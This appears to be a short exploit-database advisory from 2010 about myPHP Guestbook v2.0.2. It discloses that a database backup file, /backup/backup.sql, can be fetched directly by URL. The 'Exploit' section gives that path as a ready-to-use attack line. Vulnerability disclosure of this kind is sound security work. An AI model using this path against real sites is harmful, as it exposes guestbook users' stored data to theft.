id: 10834
date: 02/11/2010
title: myPHP Guestbook v2.0.2 Database Backup Dump Vulnerability
author: ViRuSMaN
cves: 

=========================================================
myPHP Guestbook v2.0.2 Database Backup Dump Vulnerability
=========================================================

==============================================================================
        [»] myPHP Guestbook Database Backup Dump Vulnerability
==============================================================================
 
    [»] Script:             [ myPHP Guestbook v2.0.2 ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ myPHP Guestbook is a open source project of Networkarea.ch ]
    [»] Download:           [ http://www.pc-service-backes.de/download/sonstige/myPHP_Guestbook_2.0.2.zip ]
    [»] Founder:           [ ViRuSMaN ]
 
###########################################################################
 
===[ Exploit ]===
 
    [»] http://server/[path]/backup/backup.sql
 
 
Author: ViRuSMaN <-
 
###########################################################################



#  0day.today [2023-03-23]  #